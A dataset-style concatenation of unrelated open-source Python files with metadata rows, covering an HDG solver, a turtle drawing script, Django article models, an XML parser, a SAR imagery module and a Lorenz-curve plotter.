att_on_p = tf.nn.softmax(tf.reduce_max(sim_mtx, axis=2), dim=1) #batch_size x p_length x 1
weighted_p = tf.multiply(att_on_p, p_inputs) #batch_size x p_length x hidden_size
self.outputs = tf.concat([p_inputs, linear_combo_q_for_each_p, tf.multiply(p_inputs, linear_combo_q_for_each_p), tf.multiply(p_inputs, weighted_p)], axis=2)
| mit | -5,947,735,938,825,889,000 | 55.57377 | 168 | 0.637496 | false | 3.2898 | false | false | false |
asdf123101/HDPG1D | hdpg1d/adaptation.py | 1 | 8070 | import numpy as np
from numpy import concatenate as cat
from scipy.sparse import csr_matrix
import scipy.sparse.linalg as spla
from copy import copy
import matplotlib.pyplot as plt
import warnings
from .preprocess import shape, discretization, boundaryCondition
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# supress the deprecation warning
warnings.filterwarnings("ignore", ".*GUI is implemented.*")
class hdpg1d(object):
"""
1D HDG solver
"""
def __init__(self, coeff):
self.numEle = coeff.numEle
self.numBasisFuncs = coeff.pOrder + 1
self.coeff = coeff
self.mesh = np.linspace(0, 1, self.numEle + 1)
self.enrichOrder = 1
self.primalSoln = None
self.adjointSoln = None
self.estErrorList = [[], []]
self.trueErrorList = [[], []]
def separateSoln(self, soln):
"""Separate gradState (q and u), stateFace from the given soln"""
gradState, stateFace = np.split(
soln, [len(soln) - self.numEle + 1])
return gradState, stateFace
def plotState(self, counter):
"""Plot solution u with smooth higher oredr quadrature"""
stateSmooth = np.array([])
stateNode = np.zeros(self.numEle + 1)
xSmooth = np.array([])
gradState, _ = self.separateSoln(self.primalSoln)
halfLenState = int(len(gradState) / 2)
state = gradState[halfLenState:2 * halfLenState]
# quadrature rule
gorder = 10 * self.numBasisFuncs
xi, wi = np.polynomial.legendre.leggauss(gorder)
shp, shpx = shape(xi, self.numBasisFuncs)
for j in range(1, self.numEle + 1):
xSmooth = np.hstack((xSmooth, (self.mesh[(j - 1)] + self.mesh[j]) / 2 + (
self.mesh[j] - self.mesh[j - 1]) / 2 * xi))
stateSmooth = np.hstack(
(stateSmooth, shp.T.dot(state[(j - 1) * self.numBasisFuncs:j * self.numBasisFuncs])))
stateNode[j - 1] = state[(j - 1) * self.numBasisFuncs]
stateNode[-1] = state[-1]
plt.figure(1)
plt.plot(xSmooth, stateSmooth, '-', color='C3')
plt.plot(self.mesh, stateNode, 'C3.')
plt.xlabel('$x$', fontsize=17)
plt.ylabel('$u$', fontsize=17)
# plt.axis([-0.05, 1.05, 0, 1.3])
plt.grid()
plt.pause(5e-1)
def meshAdapt(self, index):
"""Given the index list, adapt the mesh"""
inValue = np.zeros(len(index))
for i in np.arange(len(index)):
inValue[i] = (self.mesh[index[i]] +
self.mesh[index[i] - 1]) / 2
self.mesh = np.sort(np.insert(self.mesh, 0, inValue))
def solvePrimal(self):
"""Solve the primal problem"""
if 'matLocal' in locals():
# if matLocal exists,
# only change the mesh instead of initializing again
matLocal.mesh = self.mesh
else:
matLocal = discretization(self.coeff, self.mesh)
matGroup = matLocal.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# solve by exploiting the local global separation
K = -cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]]))
.dot(cat((C, E)))) + H
sK = csr_matrix(K)
F_hat = np.array([L]).T - cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]])))\
.dot(np.array([cat((R, F))]).T)
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sK, vec)
return matVec
n = len(F_hat)
preconditioner = spla.LinearOperator((n, n), invRHS)
stateFace = spla.gmres(sK, F_hat, M=preconditioner)[0]
# stateFace = np.linalg.solve(K, F_hat)
gradState = np.linalg.inv(np.asarray(np.bmat([[A, -B], [B.T, D]]))).dot(
cat((R, F)) - cat((C, E)).dot(stateFace))
self.primalSoln = cat((gradState, stateFace))
def solveAdjoint(self):
"""Solve the adjoint problem"""
# solve in the enriched space
_coeff = copy(self.coeff)
_coeff.pOrder = _coeff.pOrder + 1
if 'matAdjoint' in locals():
matAdjoint.mesh = self.mesh
else:
matAdjoint = discretization(_coeff, self.mesh)
matGroup = matAdjoint.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# add adjoint LHS conditions
F = np.zeros(len(F))
R[-1] = -boundaryCondition('adjoint')[1]
# assemble global matrix LHS
LHS = np.bmat([[A, -B, C],
[B.T, D, E],
[C.T, G, H]])
sLHS = csr_matrix(LHS)
RHS = cat((R, F, L))
# solve in one shoot using GMRES
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sLHS, vec)
return matVec
n = len(RHS)
preconditioner = spla.LinearOperator((n, n), invRHS)
soln = spla.gmres(sLHS, RHS, M=preconditioner)[0]
# soln = np.linalg.solve(LHS.T, RHS)
self.adjointSoln = soln
def DWResidual(self):
if 'matResidual' in locals():
matResidual.mesh = self.mesh
else:
matResidual = discretization(
self.coeff, self.mesh, self.enrichOrder)
matGroup = matResidual.matGroup()
A, B, BonQ, C, D, E, F, G, H, L, R = matGroup
LHS = np.bmat([[A, -B, C],
[BonQ, D, E]])
RHS = cat((R, F))
residual = np.zeros(self.numEle)
numEnrich = self.numBasisFuncs + self.enrichOrder
adjointGradState, adjointStateFace = self.separateSoln(
self.adjointSoln)
for i in np.arange(self.numEle):
primalResidual = (LHS.dot(self.primalSoln) - RHS).A1
uLength = self.numEle * numEnrich
stepLength = i * numEnrich
uDWR = primalResidual[stepLength:stepLength + numEnrich].dot(
(1 - adjointGradState)[stepLength:stepLength + numEnrich])
qDWR = primalResidual[uLength + stepLength:uLength +
stepLength + numEnrich]\
.dot((1 - adjointGradState)[uLength + stepLength:uLength +
stepLength + numEnrich])
residual[i] = uDWR + qDWR
# sort residual index
residualIndex = np.argsort(np.abs(residual))
# select top \theta% elements with the largest error
theta = 0.15
refineIndex = residualIndex[
int(self.numEle * (1 - theta)):len(residual)] + 1
return np.abs(np.sum(residual)), refineIndex
def adaptive(self):
TOL = self.coeff.TOL
estError = 10
nodeCount = 0
maxCount = self.coeff.MAXIT
while estError > TOL and nodeCount < maxCount:
# solve
self.solvePrimal()
self.solveAdjoint()
# plot the solution at certain counter
if nodeCount in [0, 4, 9, 19, maxCount]:
plt.clf()
self.plotState(nodeCount)
# record error
self.trueErrorList[0].append(self.numEle)
self.trueErrorList[1].append(
self.primalSoln[self.numEle * self.numBasisFuncs - 1])
estError, index = self.DWResidual()
self.estErrorList[0].append(self.numEle)
self.estErrorList[1].append(estError)
# adapt
index = index.tolist()
self.meshAdapt(index)
self.numEle = self.numEle + len(index)
nodeCount += 1
print("Iteration {}. Estimated target function error {:.3e}."
.format(nodeCount, estError))
if nodeCount == maxCount:
print("Max iteration number is reached "
"while the convergence criterion is not satisfied.\n"
"Check the problem statement or "
"raise the max iteration number, then try again.\n")
| mit | 3,414,982,141,776,126,000 | 38.950495 | 101 | 0.547212 | false | 3.444302 | false | false | false |
IntSPstudio/vslst-python | sta/980004006.py | 1 | 1674 | #|==============================================================|#
# Made by IntSPstudio
# Project Visual Street
# ID: 980004006
# Twitter: @IntSPstudio
#|==============================================================|#
#SYSTEM
import os
import sys
#import time
import turtle
import math
#ALG
#Ympyrän kehän koko
def calcCircleRl(rlRadius):
#2PIR
output = 2*pi*rlRadius
return output
#Laskee piiraan kehän koon
def calcCircleSliceRl(rlAngle,rlRadius):
output = rlAngle/360*pi*rlRadius*2
return output
#CONTENT SCREEN
contentscreen = turtle.Screen()
contentscreen.bgcolor("black")
#TURTLE
julle = turtle.Turtle()
julle.color("white")
julle.speed(5)
#INPUT
scriptFle = sys.argv[0]
scriptCircleRadius = sys.argv[1]
scriptCircleSliceAngle = sys.argv[2]
#BASIC VRB
#systemContinuity =1
pi = math.pi
inputCircleRadius = int(scriptCircleRadius)
inputCircleSliceAngle = int(scriptCircleSliceAngle)
inputCircleRl = calcCircleRl(inputCircleRadius)
inputCircleSliceRl = calcCircleSliceRl(inputCircleSliceAngle,inputCircleRadius)
#CLEAR SCREEN
os.system("cls")
#PRINT DATA
print(" Radius:", inputCircleRadius)
print(" Slice:", scriptCircleSliceAngle)
print("Circle Rl:", inputCircleRl)
print(" Slice Rl:", inputCircleSliceRl)
print(" %Rld:", inputCircleSliceRl / inputCircleRl *100)
#ACTION
#Start position
julle.penup()
julle.forward(inputCircleRadius)
julle.left(90)
julle.pendown()
#Circle
julle.circle(inputCircleRadius)
#Slice
julle.pendown()
julle.left(90)
julle.forward(inputCircleRadius)
julle.right(180 - inputCircleSliceAngle)
julle.forward(inputCircleRadius)
julle.right(180)
julle.forward(inputCircleRadius)
#Wait
contentscreen.mainloop()
os.system("cls") | mit | -8,946,986,960,882,005,000 | 23.231884 | 79 | 0.72711 | false | 2.957522 | false | false | false |
progdupeupl/pdp_website | pdp/article/models.py | 1 | 7425 | # coding: utf-8
#
# This file is part of Progdupeupl.
#
# Progdupeupl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Progdupeupl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Progdupeupl. If not, see <http://www.gnu.org/licenses/>.
"""Models for article app."""
import os
import string
from django.db import models
# from django.db.models.signals import post_save
from django.conf import settings
# from django.dispatch import receiver
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from taggit.managers import TaggableManager
from pdp.utils import slugify
from pdp.utils.models import has_changed
from pdp.tutorial.models import Tutorial
from PIL import Image
from io import StringIO
from django.core.files.uploadedfile import SimpleUploadedFile
IMAGE_MAX_WIDTH = 64
IMAGE_MAX_HEIGHT = 64
def image_path(instance, filename):
"""Return path to an article image.
Returns:
string
"""
ext = filename.split('.')[-1]
filename = u'original.{}'.format(string.lower(ext))
return os.path.join('articles', str(instance.pk), filename)
def thumbnail_path(instance, filename):
"""Return path to an article thumbnail.
Returns:
string
"""
ext = filename.split('.')[-1]
filename = u'thumb.{}'.format(string.lower(ext))
return os.path.join('articles', str(instance.pk), filename)
class ArticleCategory(models.Model):
"""A way to organize article in different category."""
class Meta:
verbose_name = u'Catégorie d’article'
verbose_name_plural = u'Catégories d’article'
title = models.CharField(u'Titre', max_length=80)
slug = models.SlugField(max_length=80)
def __str__(self):
"""Textual representation of a category.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the category.
Returns:
string
"""
return reverse('pdp.article.views.by_category', args=(
self.slug,
))
def get_article_count(self):
"""Return number of articles in this category."""
return Article.objects \
.filter(is_visible=True) \
.filter(category__pk=self.pk).count()
class Article(models.Model):
"""An article."""
class Meta:
verbose_name = u'Article'
verbose_name_plural = u'Articles'
title = models.CharField(u'Titre', max_length=80)
description = models.CharField(u'Description', max_length=200)
text = models.TextField(u'Texte', blank=True)
author = models.ForeignKey(User, verbose_name=u'Auteur',
related_name='articles')
slug = models.SlugField(max_length=80)
pubdate = models.DateTimeField(u'Date de publication', blank=True)
tags = TaggableManager()
image = models.ImageField(upload_to=image_path,
blank=True, null=True, default=None)
thumbnail = models.ImageField(upload_to=thumbnail_path,
blank=True, null=True, default=None)
is_visible = models.BooleanField(u'Est visible publiquement',
default=False)
is_pending = models.BooleanField(u'Est en attente', default=False)
is_beta = models.BooleanField(u'Est visible par les membres',
default=False)
category = models.ForeignKey(ArticleCategory, null=True, blank=True,
verbose_name=u'Catégorie')
to_tutorial = models.ForeignKey(Tutorial,
verbose_name=u'Tutoriel correspondant',
null=True, blank=True)
def __str__(self):
"""Textual representation of an article.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the article.
Returns:
string
"""
return reverse('pdp.article.views.redirect_view', args=(
self.pk, self.slug,
))
def get_pdf_url(self):
"""Get URL to get a PDF file of this article."""
return u'{}/articles/{}/{}.pdf'.format(
settings.MEDIA_URL,
self.pk,
self.slug,
)
def get_edit_url(self):
"""Get URL to edit the article.
Returns:
string
"""
return '/articles/editer?article={0}'.format(self.pk)
def get_download_url(self):
return u'{}?article={}'.format(
reverse('pdp.article.views.download'),
self.pk)
def save(self, force_update=False, force_insert=False,
thumb_size=(IMAGE_MAX_HEIGHT, IMAGE_MAX_WIDTH)):
"""Save the article.
This will save thumbnail on disk and then save the model in database.
"""
self.slug = slugify(self.title)
if has_changed(self, 'image') and self.image:
# TODO : delete old image
image = Image.open(self.image)
if image.mode not in ('L', 'RGB'):
image = image.convert('RGB')
image.thumbnail(thumb_size, Image.ANTIALIAS)
# save the thumbnail to memory
temp_handle = StringIO()
image.save(temp_handle, 'png')
temp_handle.seek(0) # rewind the file
# save to the thumbnail field
suf = SimpleUploadedFile(os.path.split(self.image.name)[-1],
temp_handle.read(),
content_type='image/png')
self.thumbnail.save('{}.png'.format(suf.name), suf, save=False)
# save the image object
super().save(force_update, force_insert)
else:
super().save()
def get_last_articles():
"""Get the last published articles.
This should be used for the home page article displaying.
Returns:
list of Article
"""
return Article.objects.all()\
.filter(is_visible=True)\
.order_by('-pubdate')[:5]
def get_prev_article(g_article):
"""Try to get the previous article ordered by pubdate.
If g_article is the first article ever, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__lt=g_article.pubdate)\
.order_by('-pubdate')[0]
except IndexError:
return None
def get_next_article(g_article):
"""Try to get the next article ordered by pubdate.
If g_article is the last one, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__gt=g_article.pubdate)\
.order_by('pubdate')[0]
except IndexError:
return None
| agpl-3.0 | -5,753,180,119,510,398,000 | 26.072993 | 77 | 0.600566 | false | 4.111973 | false | false | false |
mdsitton/pyogl | pglgen/xmlparse.py | 1 | 3930 | from xml.parsers import expat
class TagStack(object):
def __init__(self):
self.tags = []
self.args = []
self.data = []
self.dataAdded = []
self.stackSize = 0
self.frameHasData = False
def push(self, tag, args):
self.tags.append(tag)
self.args.append(args)
self.data.append([])
self.dataAdded.append(False)
self.stackSize += 1
def add_data(self, data):
self.data[self.stackSize-1].append(data)
self.dataAdded[-1] = True
def clear_frame_data(self):
self.data[self.stackSize-1] = []
self.dataAdded[-1] = False
def is_data_added(self, posRel=0):
pos = -1 - posRel
return self.dataAdded[pos]
def pop(self):
self.dataAdded.pop()
stackFrame = (self.tags.pop(), self.args.pop(), self.data.pop())
self.stackSize -= 1
return stackFrame
def peek(self, posRel=0):
pos = -1 - posRel
return (self.tags[pos], self.args[pos], self.data[pos])
def path(self):
return '/'.join(self.tags)
class BaseParser(object):
def __init__(self, xmlParser, tag, parent, root):
# This is a hacky workaround to be able to pass in a data string
# to be accessed by any sub-parsers.
if isinstance(parent, str) or isinstance(parent, bytes):
self.strdata = parent
parent = None
else:
self.strdata = parent.strdata
self.xmlParser = xmlParser
self.parent = parent
self.tag = tag
self.root = root
if self.parent is None and self.tag is None and self.root is None:
self.isRoot = True
else:
self.isRoot = False
if self.isRoot:
self.stack = TagStack()
self.root = self
else:
self.stack = self.root.stack
self.parsers = {}
self.set_handlers()
self.init_data(self.strdata)
def set_handlers(self):
self.xmlParser.StartElementHandler = self.start
self.xmlParser.CharacterDataHandler = self.data
self.xmlParser.EndElementHandler = self.end
def restore_handlers(self):
if self.parent is not None:
self.parent.set_handlers()
def start(self, tag, attrs):
self.stack.push(tag, attrs)
tagPath = self.stack.path()
for parser in self.parsers:
if parser == tagPath:
ParserClass = self.parsers[parser]['object']
parInst = self.switch_parser(ParserClass)
self.parsers[parser]['instance'] = parInst
def data(self, data):
# We need to check if the stack frame has been used
# previously and clear the previous data if so.
if self.stack.is_data_added() is True:
self.stack.clear_frame_data()
self.stack.add_data(data.strip())
self.parse()
def end(self, tag):
if self.stack.is_data_added() is False:
self.parse()
if tag == self.tag:
self.integrate()
self.restore_handlers()
self.stack.pop()
def switch_parser(self, parser):
tag, attrs, data = self.stack.peek()
return parser(self.xmlParser, tag, self, self.root)
def register_parser(self, stackTree, parser):
self.parsers[stackTree] = {'object': parser}
# The following method stubs are what the parsing sub-classes
# will be implemented within.
def init_data(self, strData):
pass
def parse(self):
pass
def integrate(self):
pass
def parse_xml(rootParser, xmlPath, strdata):
xmlParser = expat.ParserCreate()
root = rootParser(xmlParser, None, strdata, None)
with open(xmlPath, 'rb') as xmlFile:
for line in xmlFile:
xmlParser.Parse(line.strip(), 0)
xmlParser.Parse(b'', 1)
return root
| bsd-2-clause | 870,257,657,208,985,100 | 25.554054 | 74 | 0.577354 | false | 3.845401 | false | false | false |
Applied-GeoSolutions/gips | gips/data/sarannual/sarannual.py | 1 | 6502 | #!/usr/bin/env python
################################################################################
# GIPS: Geospatial Image Processing System
#
# AUTHOR: Matthew Hanson
# EMAIL: [email protected]
#
# Copyright (C) 2014-2018 Applied Geosolutions
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
################################################################################
import os
import datetime
import gippy
from gips.data.core import Repository, Asset, Data
from gips.utils import RemoveFiles, VerboseOut
from gips import utils
class sarannualRepository(Repository):
name = 'SARAnnual'
description = 'Synthetic Aperture Radar PALSAR Mosaics'
_datedir = '%Y'
@classmethod
def feature2tile(cls, feature):
""" Get tile designation from a geospatial feature (i.e. a row) """
fldindex_lat = feature.GetFieldIndex("lat")
fldindex_lon = feature.GetFieldIndex("lon")
lat = int(feature.GetField(fldindex_lat) + 0.5)
lon = int(feature.GetField(fldindex_lon) - 0.5)
if lat < 0:
lat_h = 'S'
else:
lat_h = 'N'
if lon < 0:
lon_h = 'W'
else:
lon_h = 'E'
tile = lat_h + str(abs(lat)).zfill(2) + lon_h + str(abs(lon)).zfill(3)
return tile
class sarannualAsset(Asset):
Repository = sarannualRepository
_sensors = {
#'AFBS': 'PALSAR FineBeam Single Polarization',
'PALSAR': {'description': 'PALSAR Mosaic (FineBeam Dual Polarization)'},
#'AWB1': 'PALSAR WideBeam (ScanSAR Short Mode)',
#'JFBS': 'JERS-1 FineBeam Single Polarization'
}
_assets = {
'MOS': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_MOS\.tar\.gz$'
},
'FNF': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_FNF\.tar\.gz$'
},
}
_defaultresolution = [0.00044444444, 0.00044444444]
def __init__(self, filename):
""" Inspect a single file and get some basic info """
super(sarannualAsset, self).__init__(filename)
bname = os.path.basename(filename)
self.asset = bname[11:14]
self.tile = bname[0:7]
self.sensor = 'PALSAR'
self.date = datetime.datetime.strptime(bname[8:10], '%y')
self.rootname = bname[0:10]
def extract(self, filenames=[]):
""" Extract filesnames from asset """
files = super(sarannualAsset, self).extract(filenames)
datafiles = {}
for f in files:
bname = os.path.basename(f)
if f[-3:] != 'hdr':
bandname = bname[len(self.rootname) + 1:]
datafiles[bandname] = f
return datafiles
class sarannualData(Data):
""" Tile of data """
name = 'SARAnnual'
version = '0.9.0'
Asset = sarannualAsset
_pattern = '*'
_products = {
'sign': {
'description': 'Sigma nought (radar backscatter coefficient)',
'assets': ['MOS'],
},
'fnf': {
'description': 'Forest/NonForest Mask',
'assets': ['FNF'],
}
}
def meta(self, tile):
""" Get metadata for this tile """
return {'CF': -83.0}
def find_files(self):
""" Search path for valid files """
filenames = super(sarannualData, self).find_files()
filenames[:] = [f for f in filenames if os.path.splitext(f)[1] != '.hdr']
return filenames
def process(self, *args, **kwargs):
""" Process all requested products for this tile """
products = super(sarannualData, self).process(*args, **kwargs)
if len(products) == 0:
return
self.basename = self.basename + '_' + self.sensor_set[0]
for key, val in products.requested.items():
fname = os.path.join(self.path, self.basename + '_' + key)
# Verify that asset exists
a_type = self._products[val[0]]['assets'][0]
a_obj = self.assets.get(a_type)
if a_obj is None:
utils.verbose_out("Asset {} doesn't exist for tile {}".format(a_type, self.id), 3)
continue
datafiles = None
with utils.error_handler("Error extracting files from asset {}".format(a_obj.filename),
continuable=True):
datafiles = a_obj.extract()
if datafiles is None:
continue
if val[0] == 'sign':
bands = [datafiles[b] for b in ["sl_HH", "sl_HV"] if b in datafiles]
if len(bands) > 0:
img = gippy.GeoImage(bands)
img.set_nodata(0)
mask = gippy.GeoImage(datafiles['mask'], False)
img.AddMask(mask[0] == 255)
imgout = gippy.GeoImage.create_from(img, fname, 'float32')
imgout.set_nodata(-32768)
for b in range(0, len(imgout)):
imgout.set_bandname(img[b].description(), b + 1)
(img[b].pow(2).log10() * 10 - 83.0).save(imgout[b])
fname = imgout.filename()
img = None
imgout = None
[RemoveFiles([f], ['.hdr', '.aux.xml']) for k, f in datafiles.items() if k != 'hdr']
if val[0] == 'fnf':
if 'C' in datafiles:
# rename both files to product name
os.rename(datafiles['C'], fname)
os.rename(datafiles['C'] + '.hdr', fname + '.hdr')
img = gippy.GeoImage(fname)
img.set_nodata(0)
img = None
self.AddFile(self.sensor_set[0], key, fname)
| gpl-3.0 | 4,833,266,800,454,739,000 | 35.943182 | 104 | 0.527222 | false | 3.743235 | false | false | false |
apdjustino/DRCOG_Urbansim | src/opus_gui/results_manager/run/indicator_framework/visualizer/visualizers/matplotlib_lorenzcurve.py | 1 | 10890 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os, re, sys, time, traceback
from copy import copy
from opus_gui.results_manager.run.indicator_framework.visualizer.visualizers.abstract_visualization import Visualization
from opus_core.logger import logger
from numpy import array, arange
from numpy import ones, zeros, hstack, vstack
from numpy import trapz, trim_zeros
from pylab import subplot, plot, show
from pylab import xlabel, ylabel, title, text
from pylab import MultipleLocator, FormatStrFormatter
from pylab import savefig, clf, close
class LorenzCurve(Visualization):
def __init__(self, source_data, dataset_name,
attribute = None,
years = None, operation = None, name = None, scale = None,
storage_location = None):
Visualizer.__init__(self, source_data, dataset_name, [attribute],
years, operation, name,
storage_location)
self._values = None
self._ginicoeff = None
def is_single_year_indicator_image_type(self):
return True
def get_file_extension(self):
return 'png'
def get_visualization_shorthand(self):
return 'lorenzcurve'
def get_additional_metadata(self):
return {}
def _create_indicator(self, year):
"""Create a Lorenz Curve for the given indicator,
save it to the cache directory's 'indicators' sub-directory.
"""
attribute_short = self.get_attribute_alias(attribute = self.attributes[0],
year = year)
title = attribute_short + ' ' + str(year)
if self.run_description is not None:
title += '\n' + self.run_description
# Do calculation
# Make fresh copy with dtype float64 to avoid overflows
self._values = array(self._get_indicator(year, wrap = False).astype('float64'))
self._compute_lorenz()
file_path = self.get_file_path(year = year)
self._plot(attribute_short, file_path );
return file_path
def _compute_lorenz(self ):
''' Do the lorenz curve computation and save the result in the corresponding
class variables
'''
self._values.sort()
#remove 0 values from array
self._values = trim_zeros(self._values,'f')
num_values = self._values.size
F = arange(1, num_values + 1, 1, "float64")/num_values
L = self._values.cumsum(dtype="float64")/sum(self._values)
# Add (0, 0) as the first point for completeness (e.g. plotting)
origin = array([[0], [0]])
self._values = vstack((F, L))
self._values = hstack((origin, self._values))
# This is the simple form of (0.5 - integral) / 0.5
self._ginicoeff = 1 - 2 * trapz(self._values[1], self._values[0])
def _plot(self, attribute_name, file_path=None ):
clf() # Clear existing plot
a = self._values[0] * 100
b = self._values[1] * 100
ax = subplot(111)
plot(a, a, 'k--', a, b, 'r')
ax.set_ylim([0,100])
ax.grid(color='0.5', linestyle=':', linewidth=0.5)
xlabel('population')
ylabel(attribute_name)
title('Lorenz curve')
font = {'fontname' : 'Courier',
'color' : 'r',
'fontweight' : 'bold',
'fontsize' : 11
}
box = { 'pad' : 6,
'facecolor' : 'w',
'linewidth' : 1,
'fill' : True
}
text(5, 90, 'Gini coefficient: %(gini)f' % {'gini' : self._ginicoeff}, font, color='k', bbox=box )
majorLocator = MultipleLocator(20)
majorFormatter = FormatStrFormatter('%d %%')
minorLocator = MultipleLocator(5)
ax.xaxis.set_major_locator( majorLocator )
ax.xaxis.set_major_formatter( majorFormatter)
ax.xaxis.set_minor_locator( minorLocator )
ax.yaxis.set_major_locator( majorLocator )
ax.yaxis.set_major_formatter( majorFormatter)
ax.yaxis.set_minor_locator( minorLocator )
if file_path:
savefig(file_path)
close()
else:
show()
import os
from opus_core.tests import opus_unittest
from numpy import allclose
from opus_gui.results_manager.run.indicator_framework.test_classes.abstract_indicator_test import AbstractIndicatorTest
class Tests(AbstractIndicatorTest):
def skip_test_create_indicator(self):
indicator_path = os.path.join(self.temp_cache_path, 'indicators')
self.assert_(not os.path.exists(indicator_path))
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
lorenzcurve.create(False)
self.assert_(os.path.exists(indicator_path))
self.assert_(os.path.exists(os.path.join(indicator_path, 'test__lorenzcurve__attribute__1980.png')))
def skip_test_perfect_equality(self):
"""Perfect equality is when everybody has the same amount of something"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = ones(100)
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
wanted_result = vstack((arange(0, 101) / 100., arange(0, 101) / 100.))
self.assert_(allclose(lorenzcurve._values, wanted_result))
def skip_test_perfect_inequality(self):
"""Perfect inequality is when one person has all of something"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = zeros(100)
incomes[0] = 42
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
#We strip all the zero values, so the result consists of only two values
wanted_result = [[0.,1.],[0.,1.]]
self.assert_(allclose(lorenzcurve._values, wanted_result))
def skip_test_small_lorenz(self):
"""Test case for less than 100 people"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = array([1, 1, 2, 3, 4, 5])
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
wanted_result = array(
[[ 0, 1/6., 2/6., 3/6., 4/6., 5/6., 6/6. ],
[ 0, 1/16., 2/16., 4/16., 7/16., 11/16., 16/16. ]])
self.assert_(allclose(lorenzcurve._values, wanted_result))
def skip_test_small_gini(self):
"""Test case for gini coefficient for the small case"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = array([1, 1, 2, 3, 4, 5])
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
self.assertAlmostEqual(lorenzcurve._ginicoeff, 0.3125)
def skip_test_large_lorenz(self):
"""Test case for more than 100 people"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = array([731, 700, 619, 450, 419, 512, 232, 266, 131, 188,
498, 293, 935, 177, 160, 380, 538, 783, 256, 280,
731, 362, 870, 970, 674, 211, 524, 207, 513, 461,
280, 275, 410, 282, 144, 682, 573, 252, 382, 909,
719, 666, 236, 636, 628, 542, 630, 484, 629, 974,
747, 509, 281, 725, 377, 565, 495, 840, 391, 191,
929, 679, 217, 179, 336, 562, 293, 881, 271, 172,
426, 697, 293, 576, 203, 390, 522, 948, 312, 491,
531, 959, 646, 495, 306, 631, 722, 322, 876, 586,
316, 124, 796, 250, 456, 112, 661, 294, 749, 619,
134, 582, 996, 413, 421, 219, 796, 923, 832, 557])
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
wanted_result_F = arange(0, 111) / 110.
wanted_result_L = array([ 0, 0.00202803, 0.00427335, 0.00664542, 0.00907181, 0.01167928,
0.01457647, 0.01769094, 0.02089595, 0.02413718, 0.02754138,
0.03099989, 0.0346757 , 0.03842393, 0.04224459, 0.0461739 ,
0.05013943, 0.05434035, 0.0586137 , 0.06314055, 0.06770362,
0.07233912, 0.07715569, 0.0820628 , 0.08704234, 0.09211241,
0.09718249, 0.10227067, 0.10737696, 0.11268243, 0.1179879 ,
0.12329338, 0.12861696, 0.13415782, 0.13980734, 0.14552928,
0.15135987, 0.15744396, 0.16399884, 0.17082534, 0.17770615,
0.18462318, 0.19168508, 0.19876507, 0.20618911, 0.21366748,
0.22125448, 0.2288777 , 0.23659146, 0.2447398 , 0.25299678,
0.26134429, 0.27010828, 0.27899902, 0.28796219, 0.29692536,
0.30594285, 0.31515953, 0.32443052, 0.33371962, 0.34317169,
0.35265998, 0.36227502, 0.3720168 , 0.38183102, 0.39191685,
0.40209322, 0.41232391, 0.42269945, 0.43312932, 0.44366784,
0.45427878, 0.46548727, 0.47669576, 0.48806721, 0.49945678,
0.51086445, 0.52229023, 0.53380654, 0.54550393, 0.55747293,
0.56953247, 0.58173686, 0.5940318 , 0.60638105, 0.61900192,
0.63167711, 0.64469634, 0.65776989, 0.67089777, 0.68413428,
0.6973708 , 0.71089704, 0.72445949, 0.7386376 , 0.7530511 ,
0.7674646 , 0.78252997, 0.79774019, 0.81349364, 0.82935574,
0.84530837, 0.86176801, 0.87848115, 0.89530294, 0.91223337,
0.9293992 , 0.94676421, 0.9643284 , 0.98196502, 1. ])
self.assert_(allclose(lorenzcurve._values, vstack((wanted_result_F, wanted_result_L))))
if __name__ == '__main__':
try:
import matplotlib
except:
print 'could not import matplotlib'
else:
opus_unittest.main()
